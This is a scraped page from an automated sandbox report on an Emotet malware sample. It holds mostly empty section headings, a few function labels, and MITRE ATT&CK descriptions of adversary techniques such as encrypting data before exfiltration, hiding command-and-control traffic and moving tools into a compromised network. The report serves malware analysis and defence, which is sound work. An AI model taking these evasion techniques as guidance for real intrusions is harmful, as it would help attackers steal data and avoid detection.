Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report CSxylfUJcL

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Function 04B9EFDD, Relevance: 12.9, Strings: 10, Instructions: 360
COMMONCrypto

Function 04B985FF, Relevance: 5.1, Strings: 4, Instructions: 142
COMMON

Function 10002900, Relevance: 22.8, APIs: 15, Instructions: 331
COMMONLIBRARYCODE

Function 100088E0, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 131
memoryCOMMONLIBRARYCODE

Function 10013A9B, Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMONLIBRARYCODE

Function 10016380, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre